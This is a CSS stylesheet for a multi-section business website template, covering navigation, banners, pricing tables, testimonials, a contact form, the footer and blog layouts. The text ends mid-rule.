.navbar-default .navbar-nav > .active a, .navbar-default .navbar-nav > .active a:hover,
.navbar-default .navbar-nav > .active a:focus,
#navigation.affix .navbar-default .navbar-nav > .active a, #navigation.affix .navbar-default .navbar-nav > .active a:hover,
#navigation.affix .navbar-default .navbar-nav > .active a:focus{
	color:#07AAA5;
	border-bottom:3px solid #075da6;
	background-color:transparent;
}	

.navbar-toggle {
  background: transparent !important;
  border: medium none;
  margin-right: 0;
}

.navbar-toggle:hover {
  background: transparent !important;
}
.navbar-toggle .icon-bar {
  width: 22px;
  -webkit-transition: all 0.2s;
  -ms-transition: all 0.2s;
  -o-transition: all 0.2s;
  transition: all 0.2s;
  background-color:#fff !important;
}
#navigation.affix .navbar-toggle .icon-bar{
	background-color:#222 !important;
}	
.navbar-toggle .top-bar {
  transform: rotate(45deg);
  transform-origin: 10% 10%;
}
.navbar-toggle .middle-bar {
  opacity: 0;
  filter: alpha(opacity=0);
}
.navbar-toggle .bottom-bar {
  transform: rotate(-45deg);
  transform-origin: 10% 90%;
}
.navbar-toggle.collapsed .top-bar {
  transform: rotate(0);
}
.navbar-toggle.collapsed .middle-bar {
  opacity: 1;
  filter: alpha(opacity=100);
}
.navbar-toggle.collapsed .bottom-bar {
  transform: rotate(0);
}
/*Social Icons On Headers*/
ul.top-right {
  float: right;
  width: auto;
  margin: 34px 0 34px 10px;
  position:relative;
  z-index:1000;
}
#navigation.affix ul.top-right{
	margin:17px 0 17px 10px;
}
ul.top-right li{
	display:inline-block;
	margin-left:2px;
}
ul.top-right li a {
  display: block;
  font-size:13px;
  -webkit-border-radius:50%;
  border-radius:50%;
  height:26px;
  width:26px;
  text-align: center;
  line-height:26px;
  color:#075da6;
}
#navigation.affix  ul.top-right li a {
  color: #222;
}
#navigation.affix  ul.top-right li a:hover{
	color:#075da6;
}
ul.top-right li a:hover{
	background:#075da6;
}
ul.top-right li a:hover.facebook{
	  color:#3b5998;
}
ul.top-right li a:hover.twitter{
	color:#55acee;
}
ul.top-right li a:hover.instagram{
	color:#e95950;
}

#navigation.affix ul.top-right li a:hover.facebook{
	  background:#3b5998;
}
#navigation.affix ul.top-right li a:hover.twitter{
	background:#55acee;
}
#navigation.affix ul.top-right li a:hover.instagram{
	background:#e95950;
}


/* ------------- Push Menu ------------ */
#main-navigation.noborder {
  box-shadow: 0 0;
}	
.main-button {
  height: auto;
  position: fixed;
  width:auto;
  z-index: 999;
  top: 31px;
}
.main-button.right{
	right: 15px;
}
.main-button.left{
	left: 15px;
}
.main-button.left > button.menu-active{
	left:250px;
}
.main-button > button {
  background-color:#fff;
  border:none;
  padding:5px;
  -webkit-border-radius:2px;
  -ms--border-radius:2px;
  border-radius:2px;
}
.main-button > button:hover span:first-child,
.main-button > button.menu-active span:first-child{
  transform: translateY(6px) rotate(-45deg);
}

.main-button > button:hover span:nth-child(2),
.main-button > button.menu-active span:nth-child(2){
  opacity: 0;
  transform: rotate(-45deg);
}
.main-button > button:hover span:last-child,
.main-button > button.menu-active span:last-child{
  transform: translateY(-6px) rotate(-135deg);
}
.main-button > button span {
  background: #000 none repeat scroll 0 0;
  display: block;
  height: 3px;
  pointer-events: none;
  transform-style: flat !important;
  width:20px;
}.main-button > button span:nth-child(2){
  margin: 3px 0;
}
.navbar-brand {
  display: inline-block;
}
.cbp-spmenu {
    background:#fff;
    position: fixed;
	 box-shadow:0px 0px 8px 1px rgba(0,0,0,0.176);
}
.push_nav_brand{
	margin:30px 0 30px 15px;
	display: inline-block;
	width:110px;
}
.logo-space{ padding:32px 0;}
.push_nav li{
	position:relative;
	overflow: hidden;
}
.push_nav li a{
  border-bottom: 2px solid #f5f5f5;
  color: #000;
  font-size:13px;
  font-weight:600;
  display:block;
  padding:15px;
  position:relative;
  text-transform: capitalize;
  letter-spacing:1px; 
  font-family: "raleway";
}
.push_nav li a:hover, .push_nav li.active a, .push_nav .active a:hover, .push_nav li.active a:focus{
	color:#07AAA5;
}	
/* ------------- Push Menu ------------ */



/* Index5 Navigation */
.index5 .affix-top{
	top: 0;
    z-index: 999;
    width: 100%;
	background-color: #fff;
    position: fixed;
    -webkit-box-shadow: 0 2px 10px -1px rgba(87, 97, 100, 0.35);
    -moz-box-shadow: 0 2px 10px -1px rgba(87, 97, 100, 0.35);
    box-shadow: 0 2px 10px -1px rgba(87, 97, 100, 0.35);
	padding:0px;
	}

.index5 .affix-top a{
	color:#000!important;
	}

.index5 .affix-top .active a{
	color:#07AAA5!important;
	}		
.index5 .affix-top .navbar-toggle .icon-bar {
    background-color: #222 !important;
}

 




/* ------------ Main Banner ------------ */
#main-slider { color:#065da6;}
.tp-banner h2{
	font-size:54px;
}
.tp-banner p{
	font-size:25px;
}
.tp-banner p , #main-slider .tp-caption a{
	color:#004177;
}
#main-slider h2.tp-caption > span{
	display:block;
}
#main-slider .tp-caption a{
	margin:5px;
}
.tp-bullets{ display:none;} 
.tp-caption{ padding:0 15px !important;}


.layer-content p{
	color:#000;
	font-weight:400;
}

.layer-content h2{
	color:#000;
	font-weight:600;
}

.layer-content h2 span{
	color:#07AAA5;
	font-weight:600;
	display:inline-block!important;
}

.layer-content h2 span.green-text{
	color:#82b440;
}









/* ------------ Main Banner ------------ */



/* ------------ Banner With Text Rotator ------------ */
.text-rotator{
	background:url("../images/banner_text.jpg");
	padding-top:150px;
	background-size:cover;
	background-attachment:fixed;
	background-position:center center;
	width:100%;
}
.text-rotator #paralax-slider{
	padding:15% 0;
}
#paralax-slider .item-content p{
	font-size:20px;
}
#paralax-slider .item-content p ,#paralax-slider .item-content h2{
		color:#fff;
}
#paralax-slider .item-content h2{
	font-size:58px;
	margin-bottom:25px;
	font-weight:100;
}

#paralax-slider .owl-controls {
  margin-top:5%;
}
#paralax-slider .owl-controls .owl-page span{
	background: #fff; 
	text-align: center;
	height:12px;
	width:12px;
	border-radius:50%;
	opacity: 1;
}
#paralax-slider .owl-controls .owl-page span:hover,
#paralax-slider .owl-controls .active span{
    background:#6BB156;
}

ul.navbar-nav ul.dropdown-menu{
	border: none;
	left: 0;
	right: auto;
}
.navbar-default .navbar-nav li ul.dropdown-menu a{
	border: none !important;
	padding: 7px 20px;
	color: #000;
	font-size: 14px;
}

/* ------------ What We Offer ------------ */
#about{}	
#about .canvas-box{
	cursor: pointer;
}
#about .canvas-box span{
	display: inline-block;
	margin-bottom:15px;
	padding:5px;
}
#about .canvas-box span i{
  display: inline-block;
  font-size:50px;
}
.color1{ color:#07AAA5;}
.color2{ color:#99D8CC;}	
.color3{ color:#EC768C;}	
.color4{ color:#C183D6;}	
.color5{ color:#31AAE1;}
.color6{ color:#82B440;}			
#about .canvas-box:hover span i,
.counters-item:hover i,
.we-do .do-wrap:hover i{
	-moz-transform:scale(1.3);
	-ms-transform:scale(1.3);
	-o-transform:scale(1.3);
	-webkit-transform:scale(1.3);
	transform:scale(1.3);
}
#about .canvas-box:hover h4.color1{
	color:#07AAA5;
}
#about .canvas-box:hover h4.color2{
	color:#99D8CC;
}
#about .canvas-box:hover h4.color3{
	color:#EC768C;
}
#about .canvas-box:hover h4.color4{
	color:#C183D6;
}
#about .canvas-box:hover h4.color5{
	color:#31AAE1;
}
#about .canvas-box:hover h4.color6{
	color:#82B440;
}	
#about .canvas-box h4{
	margin-bottom:15px;
	color:#000;
}
/* ------------ What We Offer ------------ */



/* ------------ Paralax background ------------ */
#bg-paralax {
  background:url("../images/paralax-index1.jpg") no-repeat;
  color: #fff;
  padding:10% 0;
}
#bg-paralax , #testinomial{
  background-size:cover;
  background-position:center center;
  background-attachment:fixed;
  width:100%;
}

#bg-paralax p{
	margin-bottom:25px;
	color: #fff;
}
#bg-paralax h2{
	font-size:48px;
}
/* ------------ Paralax background ------------ */



/*  ------------ Counters Fact Info  ------------ */
#facts{}
#facts .counters-item{
	padding:26% 10%;
	font-weight:bold;
	vertical-align:middle;
	color:#fff;
	cursor:pointer;
}
#facts .counters-item h2{
	font-family: "Open Sans", sans-serif;
}	

.counters-item i {
  font-size:50px;
  display: block;
  margin-bottom:15px;
}
.counters-item p{
	color:#fff;
	text-transform: capitalize;
	font-weight:bold;
}
/*  ------------ Counters Fact Info  ------------ */




/*  ------------ Responsive Secvtion With Side Image  ------------ */
#responsive .responsive-pic{}
#responsive .responsive-pic > .col-md-6 > img{ margin-top:-42px;}
#responsive .responsive-pic > .col-md-6, #responsive .responsive-pic > .col-sm-6{
	padding-left:0;
}

#responsive .r-test h3 , #responsive .r-test h4{
	color:#222222;
}

#responsive .r-test h4{
	margin-top:40px;
	margin-bottom:20px;
}

.r-test ul.r-feature li {
  color: #1b1d1f;
  display: inline-block;
  padding-left:10px;
  text-transform: capitalize;
  width: 48%;
  margin-bottom:15px;
}

.r-test ul.r-feature li:before{
  content:'\f00c';
	font-family:'FontAwesome';
	display: inline-block;
   margin-right:10px;
   vertical-align: middle;
	color:#82B440;
}

.r-test .screens{
	margin-top:30px;
}

.r-test .screens i{
	display:inline-block;
	margin:0 3px;
}

.r-test .screens i:first-child{
	font-size:40px;
}

.r-test .screens i:nth-child(2){ font-size:30px; }

.r-test .screens i:last-child{ font-size:25px; }
/*  ------------ Responsive Secvtion With Side Image  ------------ */




/*  ------------ experties  ------------ */
.circliful {
  position: relative;
  float:left;
  margin-left:35px;
  margin-bottom:35px;
}

.circliful:first-child{
	margin-left:0;
}

.circle-text {
  background-color:#eee;
  bottom: 0;
  color: #636363;
  display: inline-block;
  height: 45px;
  left: 50%;
  line-height: 45px !important;
  margin: -22px auto 0 -22px;
  position: absolute;
  right: 50%;
  top: 50%;
  width: 45px;
  border-radius:100%;
}

.circliful p{
  bottom: -25px;
  left: 0;
  margin-top: 25px;
  position: absolute;
  right: 0;
}

.myStat2{
	width:20%;
}

.circle-info, .circle-info-half {
	color: #999;
}

.circliful .fa {
	margin: -10px 3px 0 3px;
	position: relative;
	bottom: 4px;
}
/*  ------------ experties  ------------ */




/*  ------------ What We Do ------------ */
.we-do .do-wrap{
	background:#fff;
	-webkit-box-shadow: 0 1px 1px 0 #ddd;
	-ms-box-shadow: 0 1px 1px 0 #ddd;
	box-shadow: 0 1px 1px 0 #ddd;
}
	
.we-do .do-wrap > .top{
	width:100%;
	height:72px;
	display:block;
}
.we-do .do-wrap span{
  border-radius: 100px;
  display: inline-block;
  height: 100px;
  margin-bottom: 40px;
  margin-top: -50px;
  width: 100px;
}
.we-do .do-wrap span i{
	color: #fff;
	font-size:50px;
	line-height: 99px;
	display:block;
}
.we-do .do-wrap h4{
	margin-bottom:15px;
}		
.we-do .do-wrap p,
.white-box p{
	margin:0 15px;
}
.we-do .do-wrap a{
	margin:35px 0;
	text-decoration:none;
	position:relative;
}
.we-do .do-wrap a:before,
.thinkers .thinker-wrap ul.social-contact li a:before,
.index_2#publication .wrap-pulication a:before{
  content: "";
  height: 2px;
  left: 0;
  opacity: 0;
  filter: alpha(opacity=0);
  position: absolute;
  top:100%;
  transform: translateY(-20px);
  -ms-transition: all 0.3s linear 0.1s;
  -webkit-transition: all 0.3s linear 0.1s;
  transition: all 0.3s linear 0.1s;
  width: 100%;
	
}
.we-do .do-wrap a:hover::before, .we-do .do-wrap a:focus::before{
	 opacity:1;
	 filter: alpha(opacity=100);
	 transform: translateY(0px);
	 -ms-transform:translateY(0px);
}
.we-do .do-wrap a.green-text:hover::before, .we-do .do-wrap a.green-text:focus::before{
	background:#74c8b8;
}
.we-do .do-wrap a.green-text:hover, .we-do .do-wrap a.green-text:focus{
	color:#74c8b8;
}
.we-do .do-wrap a.pink-text:hover::before, .we-do .do-wrap a.pink-text:focus::before{
	background:#ec768c;
}
.we-do .do-wrap a.pink-text:hover, .we-do .do-wrap a.pink-text:focus{
	color:#ec768c;
}
.we-do .do-wrap a.purple-text:hover::before, .we-do .do-wrap a.purple-text:focus::before{
	background:#c183d6;
}
.we-do .do-wrap a.purple-text:hover, .we-do .do-wrap a.purple-text:focus{
	color:#c183d6;
}
.we-do .do-wrap a.blue-text:hover::before, .we-do .do-wrap a.blue-text:focus::before{
	background:#31aae1;
}
.we-do .do-wrap a.blue-text:hover, .we-do .do-wrap a.blue-text:focus{
	color:#31aae1;
}
.we-do .do-wrap:hover .top, we-do .do-wrap:focus .top, .we-do .do-wrap:hover span, .we-do .do-wrap:focus span{
	background:#82b440;
	
}	

/* ------------ What We Do ------------ */




/* ------------  Our Creative Thinkers ------------  */
.thinkers .thinker-wrap img, #publication-slider .item .image img{
	width:100%;
	-moz-transition:all .2s linear;
	-ms-transition:all .2s linear;
	-o-transition:all .2s linear;
	-webkit-transition:all .2s linear;
	transition:all .2s linear;
}
.thinker-wrap p{
	margin:0 10px;
}
.thinker-image{
	width:100%;
	overflow:hidden;
	position:relative;
}
.thinker-image .overlay{
	background:rgba(7,170,165,.75);
	position:absolute;
	width:100%;
	bottom:0;
	top: auto;
	opacity:0;
	filter: alpha(opacity=0);
	left:0;
	right:0;
	cursor:pointer;
   padding:0;
	height:80px;
	-moz-transform:translateY(100%);
	-ms-transform:translateY(100%);
	-webkit-transform:translateY(100%);
	transform:translateY(100%);
}
.thinker-image .overlay.pink{
	background:rgba(236,118,140,.75);
}
.thinker-image .overlay.green{
	background:rgba(130,180,64,.75);
}	
.thinker-image:hover .overlay{
	opacity:1;
	filter: alpha(opacity=100);
	-moz-transform: translateY(0%);
	-ms-transform: translateY(0%);
	-webkit-transform: translateY(0%);
	transform: translateY(0%);
}

.thinker-image .overlay ul.social-link li a{
	border: 1px solid #fff;
}
.thinker-image .overlay ul.social-link li a > i{
	color: #fff;
}
.thinker-image .overlay ul.social-link li a:hover > i{
	color: #121416;
}
.thinker-image .overlay ul.social-link li a:hover span{
	background: #fff;
	border:1px solid #fff;
}
.thinker-wrap:hover .thinker-image img,  #publication-slider .item:hover .image img
{
	transform:scale(1.05);
	
	-webkit-transition: all 0.3s ease-in-out ;
   -moz-transition:all 0.3s ease-in-out ;
	-ms-transition:all 0.3s ease-in-out ;
   -o-transition:all 0.3s ease-in-out ;
	transition:all 0.3s ease-in-out;
}
.thinkers .thinker-wrap h3{  
	margin-top:20px;
	font-size:20px;
}
.thinkers .thinker-wrap small{
  color: #838383;
  display: inline-block;
  margin: 5px 0 15px;
}

.thinkers .thinker-wrap ul.social-contact li{
	display:inline-block;
}

.thinkers .thinker-wrap ul.social-contact li a{
	font-weight:bolder;
	color:#222222;
	margin:0 8px;
	text-transform:uppercase;
	position:relative;
	padding-bottom:3px;
}
.thinkers .thinker-wrap ul.social-contact li a:hover::before{
	 opacity:1;
	 filter: alpha(opacity=100);
	 transform: translateY(0px)
	
}
.thinkers .thinker-wrap ul.social-contact li a:hover.facebook{
	color:#3b5998 !important;
}

.thinkers .thinker-wrap ul.social-contact li a:hover.facebook::before{
	background: #3b5998;
}

.thinkers .thinker-wrap ul.social-contact li a:hover.twitter{
	color:#1da1f2;
}

.thinkers .thinker-wrap ul.social-contact li a:hover.twitter::before{
	background: #1da1f2;
}

.thinkers .thinker-wrap ul.social-contact li a:hover.linkden{
	color:#0077B5;
}

.thinkers .thinker-wrap ul.social-contact li a:hover.linkden::before{
	background: #0077B5;
}
/* ------------  Our Creative Thinkers ------------  */




/* ------------  Gallery Filter ------------  */
#project{
	padding-top:5%;
	background:#f8f8f8;
}
.work-filter {
	margin-bottom:50px;
}

.work-filter ul li {
    display: inline-block;
}

.work-filter ul li a {
  color: #222222;
  display: block;
  font-size:15px;
  padding:6px 10px;
  text-transform: capitalize;
  border-bottom:1px solid #909090;
  border-top:1px solid #909090;
  border-left:1px solid transparent;
  border-right:1px solid transparent;
  cursor: pointer;
}
.work-filter ul li a:hover,
.work-filter ul li a.active:hover{
  background-color:#07AAA5;
  border:1px solid #07AAA5;
  color: #fff;
}
.work-filter ul li a.active {
  background-color: #82b440;
  border:1px solid #82b440;
  color: #fff;
}

.mix {
    display: none;
}

.index_2 .work-item {
    width:20%;
}

.work-item {
	height:auto;
	width:auto;
	float:left;
   position: relative;
	overflow:hidden;
}

.work-item > img {
  display: block;
  height: auto;
  max-width: 100%;
  width:100%;
}
.item-containe > img{
  -webkit-transition: all 0.7s ease 0s;
   -moz-transition:all 0.7s ease 0s;
	-ms-transition:all 0.7s ease 0s;
   -o-transition:all 0.7s ease 0s;
	transition:all 0.7s ease 0s;
}
.item-container:hover  img{
	transform:scale(1.2);
	
	-webkit-transition: all 0.3s ease-in-out ;
   -moz-transition:all 0.3s ease-in-out ;
	-ms-transition:all 0.3s ease-in-out ;
   -o-transition:all 0.3s ease-in-out ;
	transition:all 0.3s ease-in-out;
}

.overlay {
	background-color:rgba(255,255,255,.8);
	position: absolute;
	left:10px;
	top:10px;
	bottom:10px;
	right:10px;
	width:auto;
	height:inherit;
	color: #222222;
	opacity: 0;
	filter: alpha(opacity=0);
	padding:2%;
	z-index:1;
}

.overlay-inner{
  margin: auto;
  position: absolute;
  top: 50%;
  -moz-transform: translateY(-50%);
  -ms-transform: translateY(-50%);
  -webkit-transform: translateY(-50%);
  transform: translateY(-50%);
  width: 100%;
}

.item-container:hover .overlay {
	opacity: 1;
	filter: alpha(opacity=100);
}
.work-item:hover .line{
	width:40%;
}
.overlay h4.color{ color:#07AAA5;}
.overlay h4.base{ color:#82A75E;}

.work-item .overlay p{
	font-size:14px;
}
.overlay .line{
	width:0%;
}
.overlay .line ,
.product-content .line{
	height:1px;
	margin:15px auto;
	background-color:#000;
	-webkit-transition: all 500ms ease-out;
	-moz-transition: all 500ms ease-out;
	-o-transition: all 500ms ease-out;
	transition: all 500ms ease-out;					 
}
/* ------------  Gallery Filter ------------  */




/* ---------- Pricing Tables ---------- */
.pricing {
	display: -webkit-flex;
	display: flex;
	-webkit-flex-wrap: wrap;
	flex-wrap: wrap;
	-webkit-justify-content: center;
	justify-content: center;
	width: 100%;
	margin: 0 auto;
}

.pricing_item {
	position: relative;
	display: -webkit-flex;
	display: flex;
	-webkit-flex-direction: column;
	flex-direction: column;
	-webkit-align-items: stretch;
	align-items: stretch;
	text-align: center;
	-webkit-flex: 0 1 330px;
	flex: 0 1 330px;
}
.pricing_list {
	text-align: left;
}
.pricing_tenzin .pricing_item {
	margin: 1em;
	padding: 2em 1em;
	text-align: left;
	color: #262b38;
	background: #EEF0F3;
	border-top: 3px solid;
	-webkit-transition: border-color 0.3s;
	transition: border-color 0.3s;
	margin-top:0;
}
.pricing_tenzin .pricing_item.pink{
	border-color:#EC768C;
}	
.pricing_tenzin .pricing_item.blue{
	border-color:#07AAA5;
}
.pricing_tenzin .pricing_item.pink .pricing_action{
	background:#EC768C;
}
.pricing_tenzin .pricing_item.blue .pricing_action{
	background:#07AAA5;
}
.pricing_tenzin .pricing_item.active{
	border-color: #82B440;
}
/*.pricing_tenzin .pricing_item.active:hover{
	border-color: #07AAA5;
} */
.pricing_tenzin .pricing_title {
	font-size: 1em;
	margin: 0 0 1em;
}
.pricing_item:hover .pricing_action{
	border:1px solid transparent;
	background:#82b440 !important;
}
.pricing_tenzin .pricing_price {
	font-size: 2em;
	padding: 0.5em 0 0.75em;
	border-top: 3px solid rgba(139, 144, 157, 0.18);
}

.pricing_tenzin .pricing_currency {
	font-size: 0.5em;
	vertical-align: super;
}

.pricing_tenzin .pricing_sentence {
	font-weight: bold;
	padding: 0 0 0.5em;
	color: #9CA0A9;
	border-bottom: 3px solid rgba(139, 144, 157, 0.18);
}

.pricing_tenzin .pricing_list {
	font-size:14px;
	padding:25px 0;	
	color: #8b909d;
}
.pricing_tenzin .pricing_list li{
	margin-bottom:8px;
}
.pricing_tenzin .pricing_list li:before{
	content:'\f00c';
	font-family:'FontAwesome';
	display: inline-block;
   margin-right:10px;
   vertical-align: middle;
	color:#82B440;
}

.pricing_tenzin .pricing_action {
	font-weight: bold;
	margin-top: auto;
	padding: 1em 2em;
	color: #fff;	
	-webkit-transition: background-color 0.3s ease-in-out;
	transition: background-color 0.3s ease-in-out;
	border:1px solid transparent;

 }
.pricing_item.active .pricing_action{
	border:1px solid transparent;
	background:#82b440;
}
.pricing_item.active:hover .pricing_action{
	border:1px solid transparent;
	background:#07AAA5 !important;
}	
/* ---------- Pricing Tables ---------- */



/* ------------ Testinomials ------------ */
#testinomial{
	background:url(../images/bg-testinomial.jpg) no-repeat;
	color:#fff;
}
#testinomial h2{ color:#82B440; }
#testinomial p{ color:#fff; }
#testinomial-slider .item{
  display: block;
  width: 100%;
  height: auto;
  color:#fff;
}

#testinomial-slider .item p {
  font-size: 20px;
  margin-left: 13%;
  margin-right: 13%;
}

#testinomial-slider .item h5{ 
	font-size:14px; 
	text-transform:uppercase; 
	margin-top:40px; 
	margin-bottom:15px;
}

#testinomial-slider .owl-prev,
#testinomial-slider .owl-next{
	border:1px solid #fff;
	color:#FFF;
}

#testinomial-slider .owl-prev,
#testinomial-slider .owl-next ,
#publication-slider .owl-prev ,
#publication-slider .owl-next {
	top:40%;
	position:absolute;
	background:transparent;
	height:38px;
	width:38px;
	-ms-border-radius:38px;
	-webkit-border-radius:38px;
	border-radius:38px;
	font-size:30px;
	line-height:20px;
	opacity:1;
	filter: alpha(opacity=100);
}

#testinomial-slider .owl-prev:hover,
#testinomial-slider .owl-next:hover ,
#publication-slider .owl-prev:hover ,
#publication-slider .owl-next:hover{
	border:1px solid #82b440;
	background-color:#82b440;
	color:#fff;
	-webkit-transition: background 0.3s linear 0.1s;
	-ms-transition: background 0.3s linear 0.1s;
	transition: background 0.3s linear 0.1s;
}
#testinomial-slider .owl-prev{
	left:0;
}
#testinomial-slider .owl-next{
	right:0;
}
/* ------------ Testinomials ------------ */



/* ------------  Publications ------------ */
#publication{}
#publication-slider .item{
  margin:0 15px;
}
#publication-slider .item:hover{
	cursor:pointer;
}	
#publication-slider .item .image{
	overflow: hidden;
  position: relative;
  width: 100%;
}

#publication-slider .item > img{
  display: block;
  width: 100%;
  height: auto;
}
#publication-slider .item h5{
	font-size:14px;
	color:#727272;
	margin-top:25px;
}
#publication-slider .item h5 , #publication-slider .item h4{
	margin-bottom:10px;
}
#publication-slider .item h4{
	font-size:20px;
	color:#222222;
}
#publication-slider .item  a.name{
	color:#222222;
}

#publication-slider .item  a.name ,
#publication-slider .item  a.comment{
	font-size:15px !important;
	margin-bottom:10px;
	display:inline-block;
	text-transform:none;
}
#publication-slider .item  a.comment{
	color:#82b440;
}
#publication-slider .item  a.comment:before{
	content:'';
	background:transparent;
}
#publication-slider .item p > a{
	font-size:15px;
}
#publication-slider .item > a{
	color:#000;
	position:relative;
	font-size:13px;
	font-weight:bold;
	text-transform: uppercase;
}
#publication-slider .item > a:hover{
	color:#82b440;
}
#publication-slider .owl-prev ,
#publication-slider .owl-next{
	border:1px solid #7a7a7a;
	color:#7a7a7a;
}
#publication-slider .owl-prev{
	left:-5%;
}

#publication-slider .owl-next{
	right:-5%;
}
/* ------------  Publications ------------ */



/* ------------ Slogan Text with Button ------------ */
#slogan{
	background:#82b440;
	padding:25px 0;
	color:#fff;
	margin-top:-2px;
	width:100%;
}
#slogan a{
  padding: 15px 35px;
  border:1px solid #fff;
  color:#000;
  background:#fff;
  font-weight:bold;
  text-transform: capitalize;
}

#slogan p {
  color: #fff;
  font-size: 20px;
  margin: 10px 0;
}
/* ------------ Slogan Text with Button ------------ */



/* ------------ Contact Us ------------ */
#contact .center h2,
#contact .center .margen{
	margin-bottom:45px;
}
#contact .center a{
	color:#82b440;
}

#contact .center ul.social-link{
	margin-top:45px;
}


#contact .form-inline{
	margin-top:45px;
}
.form-control:focus {
  border-color: #82b440 !important;
  box-shadow:none;
  transition: all 0.2s ease-in 0s;
}

#contact .form-inline .col-md-6,
#contact .form-inline .col-md-12{
	padding-left:5px;
	padding-right:5px;
}


#contact .form-inline .form-control, #contact .form-inline textarea {
  border: 1px solid #d0d0d0;
  border-radius: 0;
  color: #4c4c4c;
  font-size: 14px;
  padding: 15px;
  width: 100%;
}

#contact .form-inline .form-control{
	height:45px;
}

#contact .form-inline .form-control,
#contact .form-inline textarea{
	margin-bottom:10px;
}

#contact .form-inline textarea{
	margin-top:0;
	min-height:210px;
}
#contact .form-inline .btn-black{
	width:100%;
	color:#fff;
	
}	
#contact .form-inline input[type="submit"]{
	width:100%;
	height:100%;
	background-color:transparent;
}
/* ------------ Contact Us ------------ */




/* ---------- Footer  ---------- */
footer{
	background:#121416;
	padding:35px 0;
	position:relative;
}
footer p{
	margin:0;
	color:#a6a6a6;
	font-size:14px;
}
footer .breadcrumb{
	background-color:transparent;
	padding:0;
}

footer .breadcrumb li a {
  text-shadow: none;
  color:#fff;
	font-size:14px;
	position:relative;
}
footer .breadcrumb li a:hover, footer .breadcrumb li a:focus{
  color: #82b440;
}

.go-top {
  bottom:20px;
  position: fixed;
  font-size:20px;
  right:25px;
  z-index:800;
  background:#82b440;
  color:#fff;
  border-radius:5px;
  height:40px;
  width:40px;
  text-align:center;
  line-height:40px;
  opacity:0;
}
.go-top:hover, .go-top:focus{
	background:#07AAA5;
	color:#fff;
}
.go-top.show {
    opacity: 1;
}
/* ---------- Footer  ---------- */





 ul.social-link li a{
	display: inline-block;
	margin: 0 2px;
}

 ul.social-link li{
	margin-top:10px;
	display:inline-block;
}

 ul.social-link li a {
  border: 1px solid #000;
  border-radius: 44px;
  font-size: 20px;
  height: 44px;
  width: 44px;
  position:relative;
  color: #000 !important;
}

 ul.social-link li a span{
	border-radius: 0;
	display: block;
	height: 0;
	left: 50%;
	margin: 0;
	position: absolute;
	top: 50%;
	-webkit-transition: all 0.3s;
	-moz-transition: all 0.3s;
	-o-transition: all 0.3s;
	transition: all 0.3s;
	width: 0;
}

 ul.social-link li a:hover span {
  background: #82b440;
  border-radius:44px;
  height:44px;
  width:44px;
  border: 1px solid #82b440;
  height:44px;
  top: -1px;
  left: -1px;
  right: 0;
  bottom: 0;
}
 ul.social-link li a i {
  height: 100%;
  left: 0;
  line-height: 42px;
  position: absolute;
  top: 0;
  transition: all 0.3s ease 0s;
  width: 100%;
  z-index: 10;
}

 ul.social-link li a :hover,  ul.social-link li a:focus{
	color:#fff;
	 border: none;
}



/* ========================= Alert Classes ==================== */ 

.alert-success {
	line-height:24px;
	margin-bottom:15px;
	padding:5px;
	
	}
	
.alert-danger {
	line-height:24px;
	margin-bottom:15px;
	padding:5px;
	
}	






 



/*=========================================*/
          /* Blog WIth All Versions*/
/*=========================================*/
#area-main{}
.blog-wrap{
	background-color:#fff;
	width:100%;
	position:relative;
	overflow:hidden;
}

.blog-wrap .blog-content {
  display: table-cell;
  padding:6.5em 0;
}

.blog-content-bg {
  background-color: #fff;
  margin: 0 auto;
  padding:30px 30px 5px;
  position: relative;
  top: -60px;
  width: 95%;
}

.blog-item-v3.catItemView{
	border-bottom: 1px solid #d1d2d2;
	padding-bottom:70px;
	margin-bottom:70px;
}

.blog-item-v3 > img{
	margin-bottom:35px;
}

.blog-item-v3 .blog-content {
	padding:0;
}

.no-margin{ margin:0; border:none;}
#area-main h3{
	color:#1b1d1f;
}

#area-main p{
	color:#1b1d1f;
}

#area-main a.readmore{
	color:#fff;
	padding:10px 35px;
	background:#1b1d1f;
	border:1px solid transparent;
	display:inline-block;
	text-decoration:none;
	margin-top:20px;
}

#area-main a.readmore:hover, #area-main a.readmore:focus{
	border:1px solid #82b440;
}

#area-main ul.blog-author{
	margin:20px 0 25px;
}

#area-main ul.blog-author li{
	display:inline-block;
}

#area-main ul.blog-author li a{
	color:#696969;
	font-size:14px;
	margin-right:15px;
}

#area-main ul.blog-author li a .fa{
	margin-right:5px;
}

#area-main ul.blog-author li a:hover, #area-main ul.blog-author li a:focus{
	color:#82b440;
}

.morepost-wrap{
	margin-top:75px;
	border-top:1px solid #d1d2d2;
}

.morepost-wrap2{
	border-top:1px solid #d1d2d2;
	border-bottom:1px solid #d1d2d2;
	padding-bottom:25px;
}

.morepost-wrap a:hover ,
.morepost-wrap2 a:hover{
	color:#82b440;
}

.morepost-wrap .morepost ,
.morepost-wrap2 .morepost{ 
  font-size:16px;
  color:#696969;
  margin-top:25px;
  display:inline-block;
  position: relative;
}

.morepost-wrap2 .morepost .fa-long-arrow-left,
.morepost-wrap .morepost .fa-long-arrow-left{
	right:0;
}

.morepost-wrap2 .morepost:hover .fa-long-arrow-left,
.morepost-wrap .morepost:hover .fa-long-arrow-left{
	opacity:1 !important;
	filter: alpha(opacity=100);
   color:#82b440;
	right:100%;
}

.morepost-wrap2 .morepost .fa-long-arrow-left,
.morepost-wrap2 .morepost .fa-long-arrow-right,
.morepost-wrap .morepost .fa-long-arrow-left , 
.morepost-wrap .morepost .fa-long-arrow-right{
	color: transparent;
	pointer-events: none;
   position: absolute;
   text-shadow: 0 0 transparent;
   top:25%;
   transform: translateX(-50%);
   transition: text-shadow 0.3s ease 0s, color 0.3s ease 0s;
  -webkit-transition: all 0.3s ease 0s;
	-ms-transition: all 0.3s ease 0s;
	transition: all 0.3s ease 0s;
	opacity:0 !important;
	filter: alpha(opacity=0);
}

.morepost-wrap2 .morepost .fa-long-arrow-right,
.morepost-wrap .morepost .fa-long-arrow-right{
  left:0%;
  margin-left:5px;
}

.morepost-wrap2 .morepost:hover  .fa-long-arrow-right,
.morepost-wrap .morepost:hover .fa-long-arrow-right{
	opacity:1 !important;
	filter: alpha(opacity=100);
   color:#82b440;
	left:110%;
}

.blog-content-pic{}
.blog-content-pic img{ width:100%;}
.blog-item .blog-content{
	padding:0;
	margin:35px 0;
}

.blog-item .blog-content p{
	margin-bottom:25px;
}

.blog-item blockquote{
	color:#82b440;
}

.blog-item .post-tag{
	border:1px solid #d9d9d9;
	padding:5px;
	margin-bottom:70px;
}

#area-main .tag-cloud li {
  display: inline-block;
  margin: 6px;
}

#area-main .tag-cloud li a{
	 display:block;
}

#area-main .tag-cloud li a , .blog-reply a.btn-rep{
    background:#efefef;
    color: #1b1d1f;
